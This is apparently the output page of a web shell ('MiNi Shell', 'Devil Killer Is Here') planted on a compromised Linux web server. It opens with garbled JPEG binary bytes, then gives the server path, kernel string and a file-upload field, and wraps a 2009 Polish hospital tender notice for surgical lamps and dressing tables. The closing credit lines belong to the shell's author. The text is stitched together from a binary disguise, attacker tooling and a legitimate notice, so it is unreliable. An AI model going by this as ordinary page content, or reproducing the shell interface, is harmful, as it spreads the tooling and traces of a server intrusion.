JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090424/119556-N-2009.html

<p class="kh_header"><b>Włocławek: DIZ-23-2009 - dostawa lampy operacyjnej sufitowej, lamp zabiegowych i stołów opatrunkowych</b><br>
<b>Numer ogłoszenia: 119556 - 2009; data zamieszczenia: 24.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ-23-2009 - dostawa lampy operacyjnej sufitowej, lamp zabiegowych i stołów opatrunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: Lampa operacyjna sufitowa trzyogniskowa - 1 szt.
WYMAGANIA OGÓLNE
1.Mechanizm podwieszenia lampy umożliwiający wygod-ne pozycjonowanie. Obrót osi głównej lampy o co naj-mniej 270°	,	
2.Natężenie światła w odległości 1 m -  w przypadku lampy podwójnej z każdej kopuły, min. 110000 lux	
3.Wskaźnik oddawania barw Ra, min. 93	
4.Temperatura barwowa 4200 K	
5.Regulowana średnica plamy świetlnej dla kopuły 3-ogniskowej - w przypadku lampy podwójnej z każdej kopuły, 18-25 cm	
6. Odrębna regulacja natężenia oświetlenia i pola		
7.Przyrost temp. w okolicy głowy chirurga, max. 2°C	
8.Maksymalny przyrost temperatury na polu operacyjnym 12°C		
9.Moc pobierana przez żarówki kopuły 3- ogniskowej, max 165 W	
10.Żarówki halogenowe: 55W, 24 V	
11.Żywotność żarówki, min. 4000 h		
12.Minimalna średnica kopuły: 740 mm z trzema odbłyśnikami o minimalnej średnicy: 205 mm	
13.Montaż, uruchomienie i przeszkolenie personelu zama-wiającego	
14.Gwarancja, min. 24 miesiące	
15.Czas reakcji serwisu, max. 24 godz.	 

Przedmiot zamówienia: Lampa zabiegowa, statywowa - 6 szt.
WYMAGANIA OGÓLNE
1.Lampa mobilna statywowa, zaopatrzona w kółka z ha-mulcami 	
2.Natężenie światła lampy  w odległości 1 m od czoła lampy, od min. 35000 lux
3.Wskaźnik oddawania barw Ra, min. 93	
4.Temperatura barwowa 4200 °K		
5.Stała średnica plamy świetlnej dla lampy min. 17 cm		
6.Przyrost temperatury w okolicy głowy chirurga max. 2oC		
7.Przyrost temperatury na polu operacyjnym max 12 oC		
8.Moc pobierana przez żarówkę lampy 55 W
9.Żywotność żarówki min. 4000 h		
10.Minimalna średnica kopuły 300 mm z odbłyśnikiem o minimalnej średnicy 205 mm
11.Konstrukcja umożliwiająca czyszczenie, dezynfekcję i sterylizację powierzchni
12.Znak zgodności CE, deklaracja zgodności
13.Montaż, uruchomienie i przeszkolenie personelu zamawiającego		
14.Gwarancja, min. 24 miesiące
15.Czas reakcji serwisu, max. 24 godz.	

Przedmiot zamówienia: Stół opatrunkowy z hydrauliczną regulacją wysokości - 2 szt.
WYMAGANIA OGÓLNE
1.Konstrukcja wykonana z rur stalowych pokrytych lakierem proszkowym, odpornym na uszkodzenia mechaniczne, chemiczne oraz promieniowanie UV	
2.Długość całkowita stołu: 2000 mm (plus-minus50 mm)	
3.Szerokość całkowita stołu: 700 mm (plus-minus 50 mm)	
4.Hydrauliczna regulacja wysokości za pomocą dźwigni nożnej umieszczonej z dwóch stron stołu. Zakres regulacji: od 710 - 1110 mm, (plus-minus 50 mm)
5.Leże stołu 4-segmentowe pokryte bezszwową tapicerką	 	
6.Podstawa stołu z możliwością łatwego wypoziomowania na nierównych powierzchniach za pomocą stopek regulacyjnych 	
7.Możliwość uzyskania wygodnej pozycji leżącej, pozycji fotelowej oraz pozycji do badań ginekologicznych i urologicznych	
8.Oparcie pleców regulowane bezstopniowo w zakresie: 0 - 80o (plus-minus 5o)
9.Segment siedziska regulowany w zakresie: 0 - 20o (plus-minus 5o)
10.Pozycja Trendelenburga uzyskiwana za pomocą sprężyny gazowej. (Płynna regulacja) . Zakres regulacji: od 0 - 20° (plus-minus 5°)	
11.Pozycja anty-Trendelenburga uzyskiwana za pomocą sprężyny gazowej. (Płynna regulacja). Zakres regulacji: od 0 - 15° (plus-minus 5°)	
12.Wyposażenie stołu:
- Wieszak kroplówki chromowany - 1 szt.
- Podpora ręki z pasami do unieruchomienia
- Nierdzewne szyny do mocowania wyposażenia dodatkowego
- Wyjmowana nierdzewna misa z możliwością chowania pod leże stołu
- Uchwyt do prześcieradeł jednorazowych 		
13.Możliwość wyboru kolorów tapicerek (min. 6 kolorów)	
14.Gwarancja min. 24 miesiące
15.Serwis pogwarancyjny, odpłatny przez okres min. 10 lat
16.Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat	
17.Czas reakcji serwisu, max. 24 godz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.19.22.30-3, 31.52.41.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy :
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeśli ustawy nakładają obowiązek posiadania takich uprawnień, tj.:
- prowadzą działalność gospodarczą  w zakresie dostaw i- lub produkcji sprzętu medycznego , 
  Wykonawca, który nie prowadzi działalności w ww. branży zostanie wykluczony z  
  postępowania.
2 . posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia, tj.:
- przedstawią wykaz  dostaw sprzętu medycznego dla placówek ochrony zdrowia (co najmniej 1 dostawa za łączną wartość brutto 50 000,00zł) lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- złożą stosowne oświadczenie
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art.  24 ust. 1 i 2 ustawy pzp.
- złożą stosowne oświadczenie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca ubiegający się o udzielenie zamówienia publicznego zobowiązany jest do złożenia niżej wymienionych dokumentów:
a. wypełniony i podpisany Druk ofertowy, zgodnie z  Załącznikiem nr 1 i 1a do 
    specyfikacji;
b. oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z Załącznikiem  nr 2 do specyfikacji;
c. oświadczenie o zapoznaniu się z niektórymi przepisami, zgodnie z Załącznikiem nr 3 do  specyfikacji;
d. oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków
Zamówienia,  zgodnie z   Załącznikiem nr 4 ;
e. zaakceptowany i podpisany projekt umowy stanowiący Załącznik nr 5 do  specyfikacji;
f. pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów  rejestracyjnych) w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów  rejestracyjnych ;  
g. upoważnienie do podpisania oferty (fakultatywnie).
2. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 1 Zamawiający żąda następujących dokumentów:
a. koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek ich posiadania na podjecie działalności gospodarczej w zakresie objętym zamówieniem;
b. aktualny odpis z właściwego rejestru, albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż  6 miesięcy przed upływem  terminu składania ofert;
3. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 2 Zamawiający żąda złożenia następujących dokumentów:
a.  wykaz wykonanych dostaw sprzętu medycznego dla placówek ochrony zdrowia, wraz z załączeniem dokumentów potwierdzających, że wskazane dostawy zostały wykonane z należytą starannością (co najmniej 1 dostawa za łączną wartość brutto 50 000,00 zł),zgodnie z Załącznikiem nr 6  do   specyfikacji;

4. Celem potwierdzenia warunku określonego w rozdziale V pkt 3 Zamawiający żąda złożenia następujących dokumentów:
a. pisemne oświadczenie, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie wykonywanej działalności gospodarczej.
5.  Celem potwierdzenia, że oferowana dostawa odpowiada opisowi przedmiotu zamówienia  Zamawiający żąda:
a. dokumentu potwierdzającego, że zaoferowany asortyment wpisany jest do Rejestru Wyrobów Medycznych i dopuszczony do obrotu zgodnie z ustawą z dnia 20 kwietnia 2004r. o wyrobach medycznych ( Dz. U. Nr 93, poz.896 ze zm.) - jeśli jest to wymagane

Wszystkie dokumenty muszą być złożone w oryginale lub w postaci kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty.
Jeżeli wykonawca składa dokumenty stanowiące tajemnicę firmy w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji, winny być opatrzone napisem  TAJNE. W tym celu należy również wypełnić Załącznik nr 7 do specyfikacji..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.szpital.wloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki
Dział Inwestycji i Zaopatrzenia
ul. Wieniecka 43
87-800 Włocławek
(biurowiec, III piętro, pok. 303).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 10:00, miejsce: Szpital Wojewódzki
Dział Inwestycji i Zaopatrzenia
ul. Wieniecka 43
87-800 Włocławek
(biurowiec, III piętro, pok. 303).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com